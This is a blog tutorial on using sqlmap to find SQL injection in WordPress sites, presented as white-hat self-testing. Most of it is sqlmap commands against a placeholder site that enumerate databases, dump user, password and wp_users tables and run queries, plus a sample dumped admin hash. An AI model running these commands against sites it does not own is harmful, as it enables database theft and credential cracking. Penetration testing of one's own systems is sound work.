• Home
  • Archive
  • Tools
  • Contact Us

The Customize Windows

Technology Journal

  • Cloud Computing
  • Computer
  • Digital Photography
  • Windows 7
  • Archive
  • Cloud Computing
  • Virtualization
  • Computer and Internet
  • Digital Photography
  • Android
  • Sysadmin
  • Electronics
  • Big Data
  • Virtualization
  • Downloads
  • Web Development
  • Apple
  • Android
Advertisement
You are here:Home » sqlmap Tutorial : WordPress SQL Injection Testing (White Hat)

By Abhishek Ghosh July 9, 2017 1:06 pm Updated on July 9, 2017

sqlmap Tutorial : WordPress SQL Injection Testing (White Hat)

Advertisement

We talked about SQL injection in older article. Here is a sqlmap tutorial for WordPress SQL injection testing for the beginners to test own website for potential vulnerabilities & fix them. This website and tutorial is intended for White Hat purposes only. Of course trying them upon others vulnerable WordPress installation will find the points and at the end it is possible to hack it. That is not we are teaching. We are teaching to test them on own websites – live or custom created for test. We can only teach the basics, to create an understanding of how the real tool with real hacker works.

sqlmap Tutorial WordPress SQL Injection Testing White Hat

Whether you can research, use proxy, use safe strategies to protect from Governmental spyware that is dependent on your future growing knowledge. This is official website of salmap :

Vim
1
2
http://sqlmap.org
https://github.com/sqlmapproject/sqlmap/wiki/Usage

Basic theory is that – WordPress has URLs with the syntax /vulnerable.php?id=IDIOT. sqlmap is a suitable tool to extort good amount of information which the site owner dislikes to disclose.

Advertisement

---

 

sqlmap Tutorial : WordPress SQL Injection Testing

 

For the most it is practical to use SSH screen aka own server to run test. So SSH to your server and become root user. Change directory to somewhere like /tmp. Clone the official repo of sqlmap :

Vim
1
2
3
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap*
ls -al

You’ll notice that there are files like sqlmap.conf, sqlmap.py, sqlmapapi.py. If we run :

Vim
1
2
python sqlmap.py -h
python sqlmap.py -hh

then obviously the tool will show usage options. Your target site is fools-site.com, that site has URL like :

Vim
1
http://fools-site.com/moronic.php?id=69

Basically /moronic.php?id=69 should become /moronic/ with a 301 redirection. Although that forgetting escape is not only usage, salmap can nicely run against the submit form URLs like :

Vim
1
http://fools-site.com/form_submit.php

You can see that we have no comment form, the search is actually on other server. Of course we have contact us page. If we do not have comment, many problems get reduced. Anyway, run this :

Vim
1
sqlmap -u http://fools-site.com/moronic.php?id=69 –dbs

We have ran exploit using SQL Injection. You have to read the return output carefully, you should have retrieved two database name from that site. The one database is Information_schema and the other one we do not know, you will find. When database name is know then password is only unknown. What that database has you’ll get with these commands :

Vim
1
2
3
python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" -b
python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --users --passwords --privileges --roles --threads=10
python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --current-user --is-dba --current-db --hostname --threads=10

Take that another database name is fools_db, then we can restive tables :

Vim
1
sqlmap -u http://fools-site.com/moronic.php?id=69 -D fools_db –tables

You can retrieve users, admin, payment info from above example. If you run :

Vim
1
python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --dump -D fools_db -T users

You’ll feel as if the database server is yours :

Vim
1
2
3
4
5
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 7QtzDHFO8nDvP900nu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+

You have to crack the 7QtzDHFO8nDvP900nu hash to get text password. Specially for WordPress it can go :

Vim
1
sqlmap --dbms=MySQL -u http://fools-site.com/moronic.php?id=69 -p id -D fools_db -T wp_users --dump

You can run some commands like the site owner :

Vim
1
python sqlmap.py -u "http://fools-site.com/moronic.php?id=69" --sql-query="select now();"

If there is a vulnerable plugin, this is a funny command :

Vim
1
2
sqlmap -u "http://fools-site.com/wp-admin/admin-ajax.php"
--data="action=spAjaxResults&PLUGIN-NAME=2" --dump -T wp_users -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3

Tagged With sqlmap wordpress , wordpress sqlmap , sqlmap tutorial , paperuri:(8e062e8eaa676ca98268a6729071a1a5) , http://wwwhttps://meuwwwcursoonlinehackerpentest wordpress com/article php?id=1) , list of architects yandex ru loc:US , sqlmap on wordpress , wordress wesite vulnerability sqlmap , dqlmap on wordpress , https://yandex ru/clck/jsredir?from=yandex ru;search;web;;&text=&etext=1835 4_0ZXLl16xGOfD8iATSpmi1dmkQ-Onqepzhwi3-y3MttvzQlTG9qjHCutTTyPKrN 451ff07c364be38fad70721c4dd208273bb99ef8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXme
Facebook Twitter Pinterest

Abhishek Ghosh

About Abhishek Ghosh

Abhishek Ghosh is a Businessman, Surgeon, Author and Blogger. You can keep touch with him on Twitter - @AbhishekCTRL.

Here’s what we’ve got for you which might like :

Articles Related to sqlmap Tutorial : WordPress SQL Injection Testing (White Hat)

  • How to Prevent SQL Injection

    SQL injection is the exploitation of a vulnerability related to SQL databases. The vulnerability is usually caused by a programming bug in a program that accesses the database. Due to this programming error, an attacker can inject database commands and, depending on the individual case, read further data from the database, change or delete data […]

  • SQL Injection : What is SQL Injection and What Actually Happens

    SQL Injection is the exploitation of a vulnerability in the context of SQL databases, through the lack of masking or review of meta results in user input.

  • Nginx WordPress Installation Guide (All Steps)

    This is a Full Nginx WordPress Installation Guide With All the Steps, Including Some Optimization and Setup Which is Compatible With WordPress DOT ORG Example Settings For Nginx.

  • What is Code Injection

    Code injection is the exploitation of a computer error caused by the processing of invalid data. The injection is used by an attacker to inject code into a vulnerable computer program and bring it to execution. The result of a successful code injection can be devastating, such as the spread of computer viruses or worms. […]

performing a search on this website can help you. Also, we have YouTube Videos.

Take The Conversation Further ...

We'd love to know your thoughts on this article.
Meet the Author over on Twitter to join the conversation right now!

If you want to Advertise on our Article or want a Sponsored Article, you are invited to Contact us.

Contact Us

Subscribe To Our Free Newsletter

Get new posts by email:

Please Confirm the Subscription When Approval Email Will Arrive in Your Email Inbox as Second Step.

Search this website…

 

Popular Articles

Our Homepage is best place to find popular articles!

Here Are Some Good to Read Articles :

  • Cloud Computing Service Models
  • What is Cloud Computing?
  • Cloud Computing and Social Networks in Mobile Space
  • ARM Processor Architecture
  • What Camera Mode to Choose
  • Indispensable MySQL queries for custom fields in WordPress
  • Windows 7 Speech Recognition Scripting Related Tutorials

Social Networks

  • Pinterest (24.3K Followers)
  • Twitter (5.8k Followers)
  • Facebook (5.7k Followers)
  • LinkedIn (3.7k Followers)
  • YouTube (1.3k Followers)
  • GitHub (Repository)
  • GitHub (Gists)
Looking to publish sponsored article on our website?

Contact us

Recent Posts

  • Hybrid Multi-Cloud Environments Are Becoming UbiquitousJuly 12, 2023
  • Data Protection on the InternetJuly 12, 2023
  • Basics of BJT TransistorJuly 11, 2023
  • What is Confidential Computing?July 11, 2023
  • How a MOSFET WorksJuly 10, 2023
PC users can consult Corrine Chorney for Security.

Want to know more about us?

Read Notability and Mentions & Our Setup.

Copyright © 2023 - The Customize Windows | dESIGNed by The Customize Windows

Copyright  · Privacy Policy  · Advertising Policy  · Terms of Service  · Refund Policy